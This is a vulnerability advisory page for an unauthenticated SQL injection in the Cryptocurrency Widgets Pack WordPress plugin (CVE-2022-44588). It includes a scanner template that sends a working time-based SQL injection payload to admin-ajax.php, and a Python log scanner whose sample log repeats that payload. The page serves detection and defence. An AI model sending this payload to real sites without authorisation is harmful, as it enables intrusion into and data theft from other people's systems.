
Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection

CVE-2022-44588
Verified

Description

Cryptocurrency Widgets Pack Plugin <= 1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, which lets attackers execute arbitrary SQL commands. Exploitation requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

35%

Published Date

February 21, 2026

Template Author

Shivam Kamboj

CVE-2022-44588.yaml
id: CVE-2022-44588

info:
  name: Cryptocurrency Widgets Pack <= 1.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Cryptocurrency Widgets Pack Plugin <=1.8.1 for WordPress contains an unauthenticated SQL injection caused by unsanitized user input in database queries, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion of sensitive information.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44588
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44588
    epss-score: 0.34664
    epss-percentile: 0.97073
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/cryptocurrency-widgets-pack"
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cryptocurrency-widgets-pack,unauth

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&start=0&length=10&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x))&order[0][column]=0&order[0][dir]=ASC HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 200'
          - 'contains_all(body, "recordsTotal", "recordsFiltered", "draw")'
        condition: and
# digest: 4a0a0047304502206c27a0c9c41e110b38a5d62a0bedcf29506a7cdb007435afd20dd18304c99077022100b43d79c5d03ca360df1470f140bad885f8c67ee7d3af115be17642592dfa5a94:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2022-44588
CWE ID: CWE-89

References

https://nvd.nist.gov/vuln/detail/CVE-2022-44588
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cryptocurrency-widgets-pack/cryptocurrency-widgets-pack-181-unauthenticated-sql-injection-2

Remediation Steps

Update to the latest version of the plugin where the vulnerability is fixed.
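
To check whether the request shape used by the template above has already reached a site, the following added example (not part of the template or the plugin) scans web access logs for `action=mcwp_table` requests whose `columns[N][name]` value is not a plain identifier. The combined log format, the sample lines and the rule that legitimate column names are plain identifiers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# DataTables column-name parameter, e.g. columns[0][name].
COLUMN_KEY_RE = re.compile(r'columns\[\d+\]\[name\]')
# Assumption: a legitimate column name is a plain identifier (or empty).
SAFE_NAME_RE = re.compile(r'[A-Za-z0-9_]*')


def suspicious_column_names(log_line):
    """Return non-identifier column names sent to the mcwp_table AJAX action."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    # parse_qsl percent-decodes keys and values, so encoded brackets still match.
    params = parse_qsl(url.query, keep_blank_values=True)
    if ("action", "mcwp_table") not in params:
        return []
    return [value for key, value in params
            if COLUMN_KEY_RE.fullmatch(key) and not SAFE_NAME_RE.fullmatch(value)]


def scan(lines):
    """Return (line_number, values) for each log line with a suspicious column name."""
    hits = []
    for number, line in enumerate(lines, start=1):
        values = suspicious_column_names(line)
        if values:
            hits.append((number, values))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Feb/2026:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&columns%5B0%5D%5Bname%5D=rank HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Feb/2026:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&draw=1&columns[0][name]=EXP(~(SELECT*FROM(SELECT+SLEEP(8))x)) HTTP/1.1" 200 98 "-" "-"',
    '198.51.100.7 - - [21/Feb/2026:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: {values}")
```

Access logs normally record only the query string, so the same parameters sent in a POST body would need request-body logging or a WAF rule to be seen.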